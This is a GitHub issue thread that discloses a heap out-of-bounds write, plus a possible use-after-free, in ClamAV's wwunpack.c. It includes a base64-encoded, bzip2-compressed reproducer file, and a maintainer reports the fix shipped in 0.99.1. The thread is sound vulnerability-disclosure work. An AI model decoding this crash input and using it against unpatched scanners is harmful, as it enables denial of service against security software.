### ISSUE TITLE
wwunpack.c:224 heap OOB write DoS

### ISSUE THREAD

**Issue by felixgr** [vrtadmin/clamav-devel#35]
In wwunpack, a heap out-of-bounds write can occur with little control over the written value (scounts is the number of sections):

```
224     exe[pe+6]=(uint8_t)scount;
225     exe[pe+7]=(uint8_t)(scount>>8);
```

Repro (bzip compressed & base64 encoded):

```
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
```

**Comment by felixgr** [comment]
Also note that on line 226 and 227 a heap use-after-free can occur because the bounds is also not checked.

**Comment by steve-morgan** [comment]
Tracking with https://bugzilla.clamav.net/show_bug.cgi?id=11442.

**Comment by felixgr** [comment]
Was there any progress? Can you add groebert at google.com to the ACL of the bugzilla bug?

**Comment by steve-morgan** [comment]
The fix for this issue shipped with ClamAV 0.99.1.
